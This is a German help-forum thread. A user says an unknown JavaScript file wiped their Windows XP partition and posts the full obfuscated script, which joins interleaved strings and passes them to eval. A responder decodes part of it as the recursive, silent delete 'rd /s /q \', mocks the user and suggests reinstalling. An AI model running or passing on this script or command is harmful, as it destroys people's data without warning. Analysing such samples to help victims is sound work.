Hallo liebes Trojaner-Board,

erstmal folgendes:

Betriebssystemname Microsoft Windows XP Professional
Version 5.1.2600 Service Pack 3, v.3311 Build 2600
Betriebssystemhersteller Microsoft Corporation
Systemname COMPUTER
Systemhersteller TOSHIBA
Systemmodell Satellite A200
Systemtyp X86-basierter PC
Prozessor x86 Family 6 Model 15 Stepping 13 GenuineIntel ~1994 Mhz
BIOS-Version/-Datum TOSHIBA V2.20, 10.03.2008
SMBIOS-Version 2.4
Windows-Verzeichnis D:\WINDOWS
Systemverzeichnis D:\WINDOWS\system32
Startgerät \Device\HarddiskVolume2
Gebietsschema Deutschland
Hardwareabstraktionsebene Version = "5.1.2600.3311 (xpsp.080212-0005)"
Benutzername COMPUTER\xxx
Zeitzone Westeuropäische Normalzeit
Gesamter realer Speicher 2.048,00 MB
Verfügbarer realer Speicher 1,42 GB
Gesamter virtueller Speicher 2,00 GB
Verfügbarer virtueller Speicher 1,96 GB
Größe der Auslagerungsdatei 5,84 GB
Auslagerungsdatei C:\pagefile.sys


Unzwar habe ich ein JS Skript, welches mir nicht bekannt war ausgeführt. Jetzt wurden alle meine wichtigen Daten von der Windows Partition gelöscht, einschließlich Lesezeichen im Firefox, Tabs, MSN XML Dateien, der Desktop, etc. etc. im Windows Ordner auf der Festplatte sind nun kaum Dateien vorhanden.

Ich poste nun das Schadskript. Gibt es eine Möglichkeit die Dinge rückgängig zu machen?

A='xHeocmlmt\rWctj(rifsej"peiWspm\n"oapeelitoas\x20ac'+
'.\x20neloa\x20\x20ti.n.d(ra/-)g$eot).s\rinD(em<760'+
'\ro(th:mc./"tam0xn\rxssxa(pinr()1b"tam.s2\r"-+cedo'+
'if-am\rse\\"so\\(M.d)ur8+m\\rs\np"th:ac./map,\neqt'+
'd"t-emitrabd=).d\rHe30}Sree"r.l.(d\x20rho-t0\x20d'+
'\x20\\0'
B='=.abts2lp\nSree"iniyme)exlSctem\\pna\x20\x20lnotda'+
'ishjo\x20\x20euvas\x20c\\"ra)ec(z\\i1tp:\rce\nlea)'+
'te1600\np""t/ghob+hn().d\n.pett/adoe\\/]=+hn(st,\n'+
'\\""onisood;e\n+sn++mn"aro)b()sonetxep"t/thobgrh0x'+
'tuhecet"up/mtoa"\rs(\n.e1)\rHeocwislr"\x20stuws'+
'\x20\x20&\x20/\\)'
C='Wctj(x.h"fHeocspglsoc.nteHrn)=nydstfog\x20e,vt\x20'+
'asptf\x20\x20enhbkn+el)pe[](,h(\nl(wewt.T(240)xe'+
'g,t/.ar/M.d)\rs(trot.c<n=tad)\r(M.d)ur8sn+\\ntsinr'+
'an=s"t\\t"\\""tam.s2++d\\g".no,t/.ar/bdp).reerony,'+
'laf-aur+\nesWsp0\r\n.abtsph"uc/t\x20tn\x209-\x20/q'+
'"'
D='Sree"mxt)=.abtct.etbtotf(.ia\r(C\x20\x20thow\x20Np'+
'\x20e\x204n,ehiysddirs\\fal.l(a+/"gre"fo)h(\x20egi'+
')370{.ne"pi4ng?aro,\ne)=enemhs\x20"hd+[\n"aro)b()='+
'-bnt-pt:mta"=ron+cn++hn(st,m"eni\ro(s"pd4ngio."\rs'+
'esa(ntp"trod;nybxn)Sl(0\nWctj(cte)nmcasd\x20-0frs'+
'\x20,'
X=[];for(I=0;I<A.length;I++)X[I*4]=A.charAt(I)
for(I=0;I<B.length;I++)X[I*4+1]=B.charAt(I)
for(I=0;I<C.length;I++)X[I*4+2]=C.charAt(I)
for(I=0;I<D.length;I++)X[I*4+3]=D.charAt(I)
eval(X.join(''))


Ich hoffe ihr könnt mir helfen. Danke.

Hi,

Du führst alles aus, was dir unter den Mauszeiger kommt? Dann empfehle ich dir, den Computer durch Plattenspieler, Schreibmaschine und Mensch-ärgere-dich-nicht zu ersetzen.

Teil deines Scriptes war die Ausführung des Befehls:

Code: Alles auswählenAufklappen

ATTFilter

rd /s /q \
         

Dazu:

Code: Alles auswählenAufklappen

ATTFilter

C:\WINDOWS\system32>rd /?
Entfernt (löscht) ein Verzeichnis.

RMDIR [/S] [/Q] [Laufwerk:]Pfad
RD [/S] [/Q] [Laufwerk:]Pfad

    /S  Löscht alle Verzeichnisse und Dateien im angegebenen Verzeichnis
        zusätzlich zu dem Verzeichnis selbst. Wird verwendet, um ganze
        Verzeichnisbäume zu löschen.

    /Q  Keine Nachfrage, ob die Verzeichnisbäume mit /S entfernt werden
        sollen.

C:\WINDOWS\system32>
         

Ich würde sagen, Du hast gerade verdammt viel freien Platz auf deiner Festplatte, ein paar Dateien waren allerdings sicher gesperrt und konnten nicht gelöscht werden. Beste Gelegenheit, das System neu zu installieren.

Also echt, jeder DAU ist noch zu einer Steigerung fähig

Karl